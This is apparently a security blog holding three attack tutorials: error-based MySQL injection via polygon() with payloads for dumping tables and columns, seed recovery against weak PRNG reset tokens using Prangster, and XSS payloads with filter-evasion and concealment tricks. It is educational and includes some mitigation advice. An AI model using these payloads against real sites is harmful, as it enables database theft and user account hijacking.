Monday, 17 November 2014

Error: You have SQLi in your polygons

An introduction to error based SQLi

In State of the Union I introduced the SQL injection attack vector and briefly described three basic types: error, union and blind. I've already covered union based attacks in depth, so this post introduces error based SQLi. For this tutorial I will assume you already know the basics of SQL and SQLi; if you don't, please read State of the Union first.

Update - For anyone looking for a DIOS tutorial for error based injection then please check out my blog post here -


The principle of error based SQLi is the same as union based. An adversary supplies input to a web application, which uses it to build a query that is executed against a database. By including SQL in the input you can alter the behaviour of the query and return data that is outside of the original scope. For example, a search function meant to find news articles might be made to return information about the structure of the database, and even specific fields such as passwords or other sensitive information.

In union based SQLi the attack methodology is to discover where data is being returned by the database to the visible portions of the web application and then union the existing result with your own data. If the page only displays the first result in the final set, you can alter the conditions under which the original data is selected so that it returns zero results and the final set only contains your custom data.

Under some conditions this method may not work. Here are a few examples.
  • If there's any kind of logic designed to check the input parameter is valid, this stops you from making the original select return zero results. If this is encountered in a web page that can only display a fixed number of results then your appended data is ignored.
  • If none of the results are returned to the screen directly, it's possible the results might be interpreted through some other logic first and not appear on the page as plain text but rather trigger some other change.
  • If the entry point of the injection is inside a nested query you might find that, after enumerating the column count using ORDER BY, a UNION SELECT still throws an invalid column count error. This is a likely sign of a nested select.
In these cases where you cannot return arbitrary data back to the screen you need to switch from union based SQLi to error based.

MySQL errors

MySQL errors can be suppressed. However, if they're enabled and the error message is returned to the screen anywhere in the web application, you have another method of extracting data: the error message may contain parts of the SQL statement, and if part of the statement has already been evaluated it can reflect actual data from the database.

When the SQL server is presented with a query it resolves the most deeply nested parts first, then works outwards until the whole query is finished or until it hits an error. This means that if you nest a select statement inside some SQL designed to create an error, the data will be selected first and then returned to the screen inside the error message. This is the basic attack methodology of error based SQLi.

Geometric SQLi

There are numerous ways of performing error based SQLi. One recently discovered method uses the geometric functions built into MySQL. Polygon() allows you to define a polygon given a series of vertices or points. Points are defined as a pair of X,Y coordinates using double-precision, for example:

point(10.75, 21.37)

Polygons are defined as a series of points for example

polygon((0 0, 1 1, 2 2, 3 3, 4 4),(5 5, 6 6, 7 7, 8 8, 9 9))

If you provide some malformed data such as


You'll get an error something like this:

Unknown error: 1367 (Illegal non geometric '1' value found during parsing).

Note that the value '1' is reflected back in the error message. Let's try selecting something that requires the SQL server to evaluate data from the database such as the version variable.

polygon(select @@version)

Unfortunately this gives us the following error:

Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select @@version)

Let's instead try selecting the version into a temporary table which we'll call 'a' and then select the value from that, for example:

polygon(select * from(select @@version)a)

Now we get the error message:

Unknown error: 1367 (Illegal non geometric '(select `a`.`@@version` from (select @@version AS `@@version`) `a`)' value found during parsing).

This is closer to what we need. We're selecting the version number correctly and it's being evaluated by the SQL server, but the actual value is not being returned in the error message. Instead the message shows the default column name of the temporary table; when no name is explicitly stated, the default is the text of the selected expression. We can repeat this trick and nest this in yet another select, for example:

polygon((select * from (select * from (select @@version)a)b))

Now we're selecting the value from the temporary table 'a' into a new temporary table 'b'. This forces the value in table 'a' to be evaluated, so when we get an error it contains the real version number. When doing embedded or nested selects in SQL the innermost selects are evaluated first so that their values can be used by the outer selects. If the value you're trying to extract using SQLi hasn't been evaluated in the error message, simply use this trick of selecting the value twice. The error should now look something like this:

Unknown error: 1367 (Illegal non geometric '(select `b`.`@@version` from (select '5.50.00' AS `@@version` from dual) `b`)' value found during parsing).
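Pulling the evaluated value out of an error like the one above can be sketched in a few lines of Python. This is only an illustration: the function name extract_leaked_value and the regular expression are my own assumptions based on the single error format shown here, and other MySQL versions may word the message differently.

```python
import re

# Error text copied from the example above.
error = (
    "Unknown error: 1367 (Illegal non geometric "
    "'(select `b`.`@@version` from (select '5.50.00' AS `@@version` "
    "from dual) `b`)' value found during parsing)."
)

def extract_leaked_value(message):
    """Return the first quoted literal that is followed by an AS alias, or None."""
    match = re.search(r"select '([^']*)' AS `", message)
    return match.group(1) if match else None

leaked = extract_leaked_value(error)
print(leaked)  # 5.50.00
```

The pattern relies on the evaluated value appearing as a quoted literal directly before its alias, which is what distinguishes it from the unevaluated column reference earlier in the message.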

You'll now notice that the error message contains legible data pulled from the server: we've selected the MySQL version, 5.50.00. How does this look in a fictional example? Assume the following page parameter exists (the green text is the static part of the URL, red is the user supplied input)


We can swap the value 50 of the news_id parameter for our payload, which looks like this:

URL * from (select * from (select @@version)a)b))

Selecting data

You can extend this basic concept with any arbitrary SQL, so all the same tricks to map out the database and select data work as you'd expect. For example, if you want to select a list of tables from the default schema:

URL * from (select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a)b))

To find the columns inside these tables you can use the following, where TBLNAME is the name of the table you're interested in. Remember to hex encode the value.

URL * from (select * from(select group_concat(column_name) from information_schema.columns where table_name=TBLNAME)a)b))
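Hex encoding the table name can be sketched in Python as below. The helper name mysql_hex_literal and the table name "users" are hypothetical, chosen only for illustration. The result is a MySQL hexadecimal literal, which lets you supply a string value without using quote characters.

```python
def mysql_hex_literal(text):
    """Encode text as a MySQL hexadecimal literal, e.g. users -> 0x7573657273."""
    return "0x" + text.encode("utf-8").hex()

# "users" is a made up table name used purely as an example.
encoded_name = mysql_hex_literal("users")
print(encoded_name)  # 0x7573657273
```

The encoded value then takes the place of TBLNAME in the query above.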

And finally to select data:

URL * from (select * from(select group_concat(0x0a,COLUMN1,0x3a,COLUMN2,0x3a,COLUMN3) from TBLNAME)a)b))

Any feedback both positive and negative is welcomed, please leave a comment if you spot any errors or have any questions. Please do not post real world examples as they will be deleted, all questions should focus on the theory only, thank you.

Greetz to benzi who taught me this.

Monday, 3 November 2014

PRNG and other Batman fight noises

An introduction to PRNGs and why they're bad for security.

You may have heard that Pseudo Random Number Generators (PRNGs) are an unsafe source of randomness for security related purposes, and if you're like me you may have struggled to understand how this could lead to a practical attack against applications that use PRNGs. This tutorial will explain why PRNGs are bad and demonstrate a practical attack against them.

What is a PRNG?

The first thing to understand about Pseudo Random Number Generators is that they're completely deterministic: given the same starting conditions they will always produce the same string of "random" numbers. They do appear random to the human eye, however. They're superficially unpredictable and they give an even distribution of numbers across a sufficiently large output.

PRNGs are seeded, which means the random function is initialised with some initial value (the seed) that decides what the random sequence will be. If you seed a PRNG with the same value you get the same series of random numbers. This series eventually repeats itself, and the number of outputs before repetition occurs is called the period. The seed can sometimes be specified, and in some languages the default seed takes information from the system such as the time or the process ID.
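The effect of seeding is easy to see for yourself. The sketch below uses Python's random module (a Mersenne Twister) purely as a stand in for whichever PRNG an application might use; the helper name first_outputs and the seed 1234 are arbitrary choices of mine.

```python
import random

def first_outputs(seed, count=5):
    """Return the first few numbers a freshly seeded PRNG produces."""
    rng = random.Random(seed)
    return [rng.randint(0, 99) for _ in range(count)]

run_a = first_outputs(1234)
run_b = first_outputs(1234)

# Two generators seeded with the same value produce the same sequence.
print(run_a)
print(run_b)
print(run_a == run_b)  # True
```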

PRNGs are typically used in applications where behaviour only needs to superficially appear random and it doesn't matter if attackers are able to predict future values. They're typically built for speed, so they can be used in real time simulations such as video games that need some degree of apparent randomness. This is very important, because any function that is built to perform quickly can also be brute forced quickly.

It's worth noting at this stage that the seed and the internal state of the PRNG can be different sizes, typically measured in bits. Because the initial state of the PRNG is decided by the seed, the number of distinct sequences that can be generated is limited by the total number of unique seeds. A PRNG with a large internal state of thousands of bits but only a 32-bit seed will only ever realise a small fraction of its possible internal states.

It gets even worse when you consider that the initial seed may not come from a source that contains 32 bits' worth of unique information. Something like a time stamp or a process ID typically contains even less, which reduces the number of states the PRNG can actually reach to far fewer than it is internally capable of generating.

How are random numbers used?

Typically random numbers are manipulated through some process to make the range of possible values fit the desired output. For example, if you want a percentage you'd normalize the random output into a range between 0 and 100. This is commonly done by restricting the output of the PRNG to a float between 0 and 1, then multiplying the float by whatever value you need to achieve the desired range. For a percentage this would be x100. For a random letter you'd multiply by 26 and round down, which gives you 26 values between 0 and 25; you can then map each number to a letter to get plain text output derived from the numbers. Characters are often how the numbers are actually presented to the user in the form of some kind of security token, and you'll find these being used for password reset tokens and CSRF tokens.
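As a rough sketch of that mapping, the Python below turns floats between 0 and 1 into lower case letters by multiplying by the alphabet size (26) and rounding down. The function names, the seed 42 and the token length are my own assumptions; a real application may map numbers to characters quite differently.

```python
import math
import random
import string

ALPHABET = string.ascii_lowercase  # 26 letters, indexes 0 to 25

def float_to_letter(value):
    """Map a float in the range [0, 1) onto one of the 26 letters."""
    return ALPHABET[math.floor(value * len(ALPHABET))]

def make_token(rng, length=8):
    """Build a token by mapping successive PRNG outputs to letters."""
    return "".join(float_to_letter(rng.random()) for _ in range(length))

print(float_to_letter(0.0))    # a
print(float_to_letter(0.5))    # n
print(float_to_letter(0.999))  # z

token = make_token(random.Random(42))
print(token)
```

The order of ALPHABET is exactly the "alphabet" you later have to guess when attacking an application whose source you can't see.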

Attack theory

The basic theory behind attacks falls into two categories.

The first is that if you know the PRNG being used and you can determine the seed value, you're able to generate the entire string of random numbers. You can then compare some sample of random output from the application to determine where in the series the application currently is, and use that to generate the future random values. For practical attacks against PHP applications using these methods I'd highly recommend this talk from Blackhat 2012 by George Argyros and Aggelos Kiayias from the University of Athens.

In cases where the seed is unknown you can use brute force attacks. You sample some output of the application you wish to attack, run it backwards through the same maths that processed the random value into something useful, and determine what the seed is. From there you follow the same process of generating all values for that seed and working out the application's current place in the series, again allowing you to predict future outputs. For practical attacks against many different types of PRNGs using this method I'd also recommend this talk from Blackhat 2013 by Derek Soeder, Christopher Abad and Gabriel Acevedo of Cylance. You can also find their white paper here.
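To make the brute force idea concrete, here is a toy sketch in Python. It is not how Prangster works internally; it simply assumes the target seeds Python's random module with a small value (the seed 4242 and the 32768 limit are hypothetical, standing in for something like a process ID) and maps the output to lower case letters.

```python
import random
import string

ALPHABET = string.ascii_lowercase

def generate_tokens(seed, count, length=12):
    """Simulate an application issuing tokens from one seeded PRNG."""
    rng = random.Random(seed)
    return ["".join(rng.choice(ALPHABET) for _ in range(length))
            for _ in range(count)]

def recover_seed(observed_token, max_seed):
    """Try every candidate seed until one reproduces the observed token."""
    for candidate in range(max_seed):
        if generate_tokens(candidate, 1, len(observed_token))[0] == observed_token:
            return candidate
    return None

# The "victim" issues two tokens; the attacker only sees the first one.
victim_tokens = generate_tokens(4242, 2)
seed = recover_seed(victim_tokens[0], max_seed=32768)

# With the seed recovered, the next token can be predicted in advance.
predicted = generate_tokens(seed, 2)[1]
print(seed, predicted == victim_tokens[1])
```

The search only finishes quickly because the seed space is tiny, which is exactly the weakness described earlier.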

Introducing Prangster

In the talk at Blackhat 2013 that I previously mentioned, a proof of concept tool called Prangster was released. You can download it here; it's open source and written in C#. They include instructions for compiling it on the website. It requires Windows and Microsoft .NET 2.0, or can be built with Mono for Linux/Mac.

The attack methodology is quite straightforward.

1) Find an application that creates some kind of random output, this could be something like a security token used to reset passwords or account credentials.

2) Collect samples, you need to distinguish between static parts of the output and the parts which are pseudo random, for example if you're analysing randomly generated passwords and each password contains some static component then ignore that. Try and determine a unique list of all characters used in the output, is it lower case alpha only, is it alpha-numeric, etc. This is needed later to build an alphabet.

3) Determine the type of PRNG being used. Often this can be done by determining the platform the application runs on; if it's ASP.NET, for example, then there's a good chance the Microsoft Random class is being used. You also need to guess how the application maps the numeric output of the PRNG to the characters you see in your samples. If the application is open source or the source code is available you can determine this directly, otherwise it's a best guess.

4) Use Prangster to analyse the samples you've recovered, determine the seed that created this string of random numbers, then use this seed to generate all the random numbers the application is using, and use that to predict future randomness.


Once compiled you can run Prangster from the command line, it has 3 basic modes you can use.

r - Recovers the seed that generated the input. It requires the PRNG type as a parameter, a string of output that you're sure was generated in that order, and an alphabet. The alphabet is the mapping of numbers to characters; for something simple like an output that only contains lower case alpha your alphabet would probably look something like this "abcdefghijklmnopqrstuvwxyz". If you're lucky this will return the seed value used to generate the random series.

g - Reproduces a series of outputs given a specific seed and a length of output. It takes the PRNG type, the alphabet, the seed value (learnt from r) and the length of output you wish to generate as parameters.

s - Seeks a series given some initial seed and an offset, then returns the seed which represents the new state, it takes the parameters for the PRNG type, the seed value and the offset amount.

If you run Prangster without any parameters it will echo the usage to the screen.


Let's consider an example, let's say we're attacking an ASP.NET application which is generating unique password reset tokens and these tokens appear to use upper and lower case characters only, you might try the following commands in Prangster

<some collected output> | Prangster.exe r PrngDotNet abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ

If this didn't get you a result, it's possible the alphabet is wrong. This is just a best guess at how the developers mapped the random() output to readable characters; it could be reversed, for example:

<some collected output> | Prangster.exe r PrngDotNet ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz

Some trial and error is likely to be required, especially if you do not have access to the source code. Luckily Prangster runs quite quickly in most circumstances, allowing you to try multiple alphabets in a short time. If my explanation of Prangster's usage is hard to follow then I suggest watching them demo a real attack scenario in their Blackhat presentation starting at 32:40.

A final note of respect to the team at Cylance who put this together. This is an impressive tool which can predict randomness in many applications by simply analysing the output of those systems; in this respect it's completely black box analysis. Their white paper, which can be found here, goes into more depth about the optimisations they used to speed up brute force attacks.


This section is an update to this post to elaborate on the mitigation for these attacks. The solution is simple, and it's mainly through ignorance that it's not used more often: there is already a class of RNGs that produce cryptographically secure random numbers (CSRNGs). Linux comes with /dev/random and /dev/urandom, which get their randomness straight from the Linux kernel. The kernel has access to various devices attached to the system through the device drivers, which allows it to collect environmental noise that becomes the source of random number generation, rather than a static list. In Windows the equivalent is CryptGenRandom.
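In application code you rarely need to read these sources directly. As a minimal sketch, Python's secrets module draws on the operating system's secure random source for you; the function name make_reset_token and the token length of 32 are my own choices for illustration.

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits

def make_reset_token(length=32):
    """Build a token from the operating system's secure random source."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

token = make_reset_token()
url_safe = secrets.token_urlsafe(32)  # ready made helper for URL safe tokens

print(token)
print(url_safe)
```

There is no seed to recover here, so the brute force approach described above has nothing to search for.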


Cross Site Scripting

This tutorial will introduce you to Cross Site Scripting or XSS for short.

Introduction to XSS

XSS is a vulnerability in web applications which allows an attacker to inject JavaScript into a page, which then executes inside the browser of another user. It's a very powerful attack, since JavaScript can access a lot of information about the client's browser, modify the DOM (Document Object Model) of the page to alter its look and behaviour, make requests to the website on behalf of the user and modify responses. Because the script can run silently, these kinds of attacks are deadly for stealing personal information.

One common attack is session hijacking, where the value of the user's session cookie is stolen and sent to an attacker, who can use it to bypass any log in or security that relies on cookies to identify and authenticate users.

The basics

The anatomy of an XSS attack is for an attacker to supply input to a web service which is then returned to the page for others to see. There are 2 basic methods of doing this, persistent and reflected.

A persistent XSS attack sends a payload to the web application, which stores that input in permanent storage server side, typically a database. When other users make requests to the web server the reply includes the payload. For example, in the comments section of a blog post users can provide text input plus their XSS payload, which is stored in a database, and every user who visits that page loads the comment along with any script. This is a broad attack that can target many users at once.

A reflected XSS attack injects script into the page parameters of a URL, and the server responds with the script somewhere in the response. This is a one time targeted attack that only affects the users who follow that specific URL. The attacker distributes the custom malicious URL to targets either by sending it to them directly or by publishing the link somewhere on the web and hoping users click on it. A good example of a reflected attack is a search feature on a web application which creates a GET request that includes the user's search term as a page parameter and returns search results plus the payload.

Just like with SQLi attacks, not all sites are vulnerable to XSS, only sites which are badly written and contain vulnerable parameters or inputs can be attacked.

Context matters

Web applications have a page life cycle which all requests go through. During this process user input passes through several different interpreters, each of which has a set of characters that have special meaning in that context. XSS vulnerabilities exist when user input is allowed to pass into the body of HTML while containing characters that have special meaning in this context.

To stop XSS attacks the user's input must be HTML encoded before being inserted into a HTML document. This type of encoding takes all special characters and alters them to a safe equivalent which displays correctly when rendered by the browser but cannot modify the mark up. For PHP use htmlspecialchars(), documented here, and for ASP.NET use HtmlEncode(), documented here.
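To show what HTML encoding does to a payload, here is a small sketch using Python's html.escape, which plays a similar role to the PHP and ASP.NET functions mentioned above. The render_comment function and the div wrapper are hypothetical, just enough to show input being placed into the body of a page.

```python
import html

def render_comment(comment):
    """Insert user input into the body of a page after HTML encoding it."""
    return "<div>" + html.escape(comment) + "</div>"

rendered = render_comment("<script>alert(1)</script>")
print(rendered)
# <div>&lt;script&gt;alert(1)&lt;/script&gt;</div>
```

The browser displays the encoded text as the literal characters the user typed, but never treats them as a tag.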

This isn't the whole story however. If user input is inserted directly inside existing JavaScript, for example inside a <script> tag or inside any event or evaluation that runs JavaScript, then HTML encoding may not be sufficient.
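One way to see why is to look at an event attribute. The browser decodes HTML entities inside an attribute value before handing the result to the JavaScript engine, so an encoded quote turns back into a real quote. The sketch below uses html.unescape as a stand in for that decoding step; the greet() handler and the payload are made up for illustration.

```python
import html

payload = "');alert(1);//"

# HTML encode the input, as recommended for the body of a document.
encoded = html.escape(payload)
attribute = "onclick=\"greet('" + encoded + "')\""
print(attribute)
# onclick="greet('&#x27;);alert(1);//')"

# Simulate the browser decoding entities in the attribute value
# before the contents are run as JavaScript.
seen_by_javascript = "greet('" + html.unescape(encoded) + "')"
print(seen_by_javascript)
# greet('');alert(1);//')
```

In this context the input needs JavaScript string escaping as well as HTML encoding.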

For more on prevention see XSS prevention cheat sheet.

Finding vulnerabilities

To find XSS vulnerabilities you need to test all user input to the web application and check all the places in the HTML response where this input appears. This may require viewing the source code, as not all occurrences may be visible or obvious. For example, you might submit your name to a website profile page where it appears as text on the page, but it might also appear as the alt attribute of your profile image tag, which wouldn't be immediately obvious just by eye. The best trick is to use test input that's unique and won't appear anywhere else on the page, so you can search for it (ctrl+f) in the source code.

There are 3 basic types of user input:

  • Page parameters passed in the URL of a HTTP GET request.
  • Parameters passed in the body of a HTTP POST request.
  • External resources the web server fetches.

URL parameters 

Page parameters are passed in the URL of a HTTP GET request. They are typically used to modify the response you'll get from the server, and this type of input is used to create reflected XSS attacks. For testing, simply use a browser and enter different input directly into the parameters in the URL. If there are any characters you need to URL encode you can use this XSS calculator.
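If you'd rather do the URL encoding yourself, Python's urllib.parse can do it in a couple of lines. The parameter name search is only an example here.

```python
from urllib.parse import quote, unquote, urlencode

test_input = "<script>alert(1)</script>"

# Percent encode every reserved character in the value.
encoded_value = quote(test_input, safe="")
print(encoded_value)
# %3Cscript%3Ealert%281%29%3C%2Fscript%3E

# Build a whole query string; "search" is a made up parameter name.
query = urlencode({"search": test_input})
print(query)
# search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

# Decoding gives back the original input.
print(unquote(encoded_value) == test_input)  # True
```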

Note that Internet Explorer and Chrome both have XSS prevention built into the browser, which examines parameters inside the URL and looks for common XSS vectors. They will find most attempts to enter <script> tags and other basic attacks, however more subtle XSS vectors may get through. Because of this it's best to use Firefox for testing exploits first and then adapt or obfuscate the attacks for other browsers as necessary.

Another reason I recommend Firefox for testing is that when you view the source of the document you see the raw source. In both Internet Explorer and Chrome any HTML encoded characters appear as the user friendly variants, so you cannot tell the difference between a raw angle bracket < and the HTML encoded equivalent &lt;. This may lead to confusion where apparently correct HTML is not rendering as you'd expect. In Firefox this is not a problem.

POST parameters

POST parameters are passed to the server when you submit a form on the page, causing a HTTP POST. They are sent in the body of the request rather than in the URL, which makes them much harder to use for reflected attacks, since a link on its own cannot cause a post back.

There may be client side data validation done on a page in JavaScript before it will allow you to submit a form, there are different ways to bypass this, you can modify the JavaScript running in the page manually using developer tools, or you can send your HTTP POST requests through a local proxy which can intercept and modify them in transport.

Some good examples of proxies for penetration testing are Paros for Windows as well as a newer and better maintained fork called ZAP, or if you're running Linux Burp suite is popular. You need to configure and run the proxy, normally configured on the same machine as the browser. Then change your browser settings to send requests through the proxy, in Firefox open the options, switch to the "Advanced" section, select the "Network" tab, and under Connection click the "Settings..." button. Now set "localhost" or "" as the HTTP proxy and set the port you've configured your proxy to use, most default to 8080. Make sure to tick "Use this proxy server for all protocols" and OK all the windows.

Now you can capture and modify page requests. These are helpful tools not just because you can bypass client side filtering but because you're no longer limited to basic text input: you can modify everything posted back to the server. This increases the number of possible attack vectors significantly. For example, if the site allows uploading of files you can upload a normal jpg file in the browser, then proxy the request and change the file name/extension, as well as include characters that wouldn't normally be part of a legal file name. In this example, if the file name is inserted into a database and later used on a page somewhere, it could potentially be used to create XSS attacks that otherwise aren't possible using just the browser by itself.

External resources

Some web applications make requests for resources on other servers. They may crawl another web page or source of data and then insert this into their own database to be used as part of the content for a page. If the source of the data is something you can control, or if you can send the target web server some input that makes it visit a resource you're in control of, this becomes another attack vector for XSS.

A real world example I've used during testing abused a flaw in a feature to allow users to share URLs with each other. The behaviour of the target website was to take user input, visit the URL, scrape the page to find the page title and then use this as the display text for the URL. Note that the URL input itself wasn't vulnerable to XSS as the correct characters were filtered out, however the page title scraped from the external resource was vulnerable to XSS.

Keep this in mind when testing: it's not just direct user input to a web application that might be vulnerable, but any source of 3rd party data. A clever variant of this was done recently using XSS inside TXT records in DNS to inject script into any website that displayed Whois information without first HTML encoding the record.


In the real world the type of XSS vector you can use will vary greatly depending on how the output back to the page is handled and where the output is injected into. The output may be modified in one of several different ways, some common ones are:

  • Removing specific characters that aren't allowed.
  • Removing specific words or strings of characters that aren't allowed.
  • Replacing unsafe characters with the HTML safe equivalents using HTML encoding.
  • Denying the entire string altogether or throwing an error.
  • Inserting other characters to break up words that aren't allowed.
Because the number of different XSS attack vectors is so staggeringly vast, most of these techniques allow through at least some types of attack. The safest is HTML encoding, but as mentioned previously this may not stop attacks where the output is injected directly inside existing JavaScript.
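As an illustration of why removing banned strings is fragile, consider a filter that strips script tags in a single pass. The naive_filter function below is a made up example rather than any real product's filter; nesting one tag inside another means that removing the inner tag reassembles the outer one.

```python
import html

def naive_filter(text):
    """Remove banned strings in a single pass (deliberately weak)."""
    for banned in ("<script>", "</script>"):
        text = text.replace(banned, "")
    return text

crafted = "<scr<script>ipt>alert(1)</scr</script>ipt>"

filtered = naive_filter(crafted)
print(filtered)
# <script>alert(1)</script>

# HTML encoding the same input leaves nothing the browser treats as a tag.
encoded = html.escape(crafted)
print("<" in encoded)  # False
```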

You can break down the attacks into 2 basic types, those which are injected into the body of the document, and those which are inserted into the mark up of the document. Where an example below shows user input, the input appears on the first line and the resulting HTML on the line after it.

For user input that is inserted in to the body of the document you need to escape back into mark up in order to inject any kind of JavaScript, this requires using angle brackets < and >. In the example below the output is injected between div tags.


For user input that is inserted directly into parts of the mark up, for example inside the alt attribute of an image tag, you only need to escape the attribute using quotes ". In the example below I've added an event which triggers when the image has loaded. No angle brackets are required because our injection point is already inside the mark up.

test" onload="alert(1);
<img src="/images/logo.jpg" alt="test" onload="alert(1);" />
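The injection above can be reproduced with a simple string template, which also shows what changes once quotes are encoded. This is a sketch in Python; the TEMPLATE string mirrors the image tag from the example and html.escape stands in for whatever encoding function your platform provides.

```python
import html

TEMPLATE = '<img src="/images/logo.jpg" alt="{alt}" />'
user_input = 'test" onload="alert(1);'

# Without encoding, the quote closes the alt attribute early.
unsafe = TEMPLATE.format(alt=user_input)
print(unsafe)
# <img src="/images/logo.jpg" alt="test" onload="alert(1);" />

# With quotes encoded, the input stays inside the alt attribute.
safe = TEMPLATE.format(alt=html.escape(user_input, quote=True))
print(safe)
# <img src="/images/logo.jpg" alt="test&quot; onload=&quot;alert(1);" />
```

Note that encoding only angle brackets would not help here, since the payload doesn't contain any.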

Persistent attack Examples

There are too many different XSS attack vectors to mention them all in detail; for a list of many of the common techniques I highly suggest the cheat sheet. However, I will cover a few basic persistent attacks to demonstrate the principles.

Basic injection into image location:

<img src="javascript:alert(1);">

Modern browsers have very relaxed parsing engines which allow HTML containing mistakes to render correctly, so you can often remove some formatting. These tricks are often browser specific, depending on how strict the rendering engine is. This example doesn't require quotes or a semicolon:

<img src=javascript:alert(1)>

Here's a slightly more complex fictional example. Let's say you can sign up for a website and pick a user name, and you're given your own profile page on the website with a URL which ends in your profile name.

Profile Name

This could be a good and somewhat obscure attack vector. If the site programmatically creates anchor tags anywhere to link to your profile they might look like this:

<a href="/userprofile/Frosty">Visit profile</a>

The right user name might result in JavaScript execution, in this case by injecting an event into the tag. If the mouse moves over the anchor tag then it will fire the JavaScript.

Frosty" onmouseover="javascript:alert(1);
<a href="/userprofile/Frosty" onmouseover="javascript:alert(1);">Visit profile</a>

Reflected attack examples

A very common reflected attack can be found in many search features. A user enters some text to search for and clicks search, which creates a GET request to the server for the search results page, and inside that request is a page parameter which contains the search term. A fictional example:


This takes the parameter called search, with the value of usersearch. In the results page you'll find HTML that looks something like this:

<p>Your result for usersearch returned 0 results</p>

You can create a malicious URL like the following

<p>Your result for <script>alert(1)</script> returned 0 results</p>

Sending this URL to a target and having them follow it will inject JavaScript into the results page. Only the users following that specifically crafted URL will be affected.

To tidy up long or complex reflected attacks you might want to use URL shortening services like Bitly or TinyURL.

Tidying up

In some cases you might want to escape out of some input but by doing so leave behind invalid HTML which creates rendering errors on the page. There's nothing to stop you from including additional HTML and CSS in your input to correct these. In a previous example we used the onmouseover event, however if this has already been defined in the tag we'll have a problem. Consider the following:

Frosty" onmouseover="javascript:alert(1);
<a onmouseover="changecursor()" href="/userprofile/Frosty" onmouseover="javascript:alert(1);">Visit profile</a>

Because our attribute came second it won't fire. If angle brackets are allowed in the user name we could just escape out of the entire anchor tag.

<a onmouseover="changecursor()" href="/userprofile/Frosty"><script>javascript:alert(1)</script>">Visit profile</a>

However this will look messy on the page and possibly alert people that something is wrong. This is an instance where you might want to tidy up your XSS attack: create matching tags in order to form a 2nd valid anchor tag and then hide it by setting its visibility using CSS.

Frosty">Visit Profile</a><script>javascript:alert(1)</script><a style="visibility:hidden;
<a onmouseover="changecursor()" href="/userprofile/Frosty">Visit Profile</a><script>javascript:alert(1)</script><a style="visibility:hidden;">Visit profile</a>


In many cases beating blacklist filters is simply a matter of obfuscation, for example adding a character to break up key words like "javascript". The tab character and new line characters are good for this:

<img src="jav ascript:alert(1);">

<img src="jav&#x09;ascript:alert(1);">

You can often use different encoding types, for example in the URL you can supply URL encoded characters. An extremely helpful tool for calculating obfuscations can be found here.